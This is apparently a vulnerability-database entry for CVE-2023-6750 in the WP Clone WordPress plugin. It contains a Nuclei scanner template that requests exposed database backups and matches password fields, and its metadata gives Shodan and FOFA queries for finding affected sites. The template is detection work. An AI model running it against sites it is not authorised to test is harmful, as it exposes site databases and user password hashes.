| Reporter | Title | Published | Views |
|---|---|---|---|
| circl | CVE-2023-6750 | 13 Jan 2024 00:41 | – |
| cnnvd | WordPress Plugin Clone Security Vulnerability | 8 Jan 2024 00:00 | – |
| cve | CVE-2023-6750 | 8 Jan 2024 19:00 | – |
| cvelist | CVE-2023-6750 Clone < 2.4.3 - Unauthenticated Backup Download | 8 Jan 2024 19:00 | – |
| nvd | CVE-2023-6750 | 8 Jan 2024 19:15 | – |
| osv | CVE-2023-6750 | 8 Jan 2024 19:15 | – |
| patchstack | WordPress Clone Plugin <= 2.4.2 is vulnerable to Sensitive Data Exposure | 20 Dec 2023 00:00 | – |
| prion | Path traversal | 8 Jan 2024 19:15 | – |
| ptsecurity | PT-2023-32756 | 19 Dec 2023 00:00 | – |
| redhatcve | CVE-2023-6750 | 23 May 2025 04:58 | – |

```yaml
id: CVE-2023-6750

info:
  name: WordPress WP Clone <= 2.4.2 - Database Backup Exposure
  author: pussycat0x
  severity: critical
  description: |
    Clone WordPress plugin < 2.4.3 stores in-progress backup information in publicly accessible buffer files at a static file path, letting attackers access sensitive backup data. Exploitation requires no special privileges.
  impact: |
    Attackers can access sensitive backup information, potentially leading to data disclosure or manipulation.
  remediation: |
    Update to version 2.4.3 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-clone-by-wp-academy/clone-242-sensitive-information-exposure
    - https://plugins.trac.wordpress.org/changeset/3012647/wp-clone-by-wp-academy
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6750
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6750
    epss-score: 0.01961
    epss-percentile: 0.77843
    cwe-id: CWE-200
    cpe: cpe:2.3:a:developer:clone:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    product: clone
    framework: wordpress
    shodan-query: http.html:"wp-clone-by-wp-academy"
    fofa-query: body="wp-clone-by-wp-academy"
  tags: cve,cve2023,wp,wp-plugin,wordpress,wp-clone,backup

# Both requests must match for the template to report a finding.
flow: http(1) && http(2)

http:
  # Request 1: the SQL dump at the plugin's static backup path.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/database.sql"

    matchers-condition: and
    matchers:
      # Body must look like a SQL dump (both keywords present).
      - type: word
        part: body
        words:
          - "CREATE TABLE"
          - "INSERT INTO"
        condition: and

      # Body must mention at least one WordPress table or column name.
      - type: word
        part: body
        words:
          - "wp_users"
          - "wp_options"
          - "user_pass"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      # Report the first table name found in the dump.
      - type: regex
        name: db_table
        part: body
        group: 1
        regex:
          - "CREATE TABLE[^`]*`([^`]+)`"

  # Request 2: prefix.txt in the same backup directory.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt"

    matchers-condition: and
    matchers:
      # Body must be a single identifier-like token.
      - type: regex
        part: body
        regex:
          - "^[a-zA-Z0-9_]+$"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205caaba4c4a80c7cb7744bb564906a56269f1ba0f4e9bf259eb3a648738065a19022100f1be95abecb2381b53b0f41ac5a50060dfaf1a0d1d6a25c0986e1e7c5b8fef68:922c64590222798bb761d5b6d8e72950
```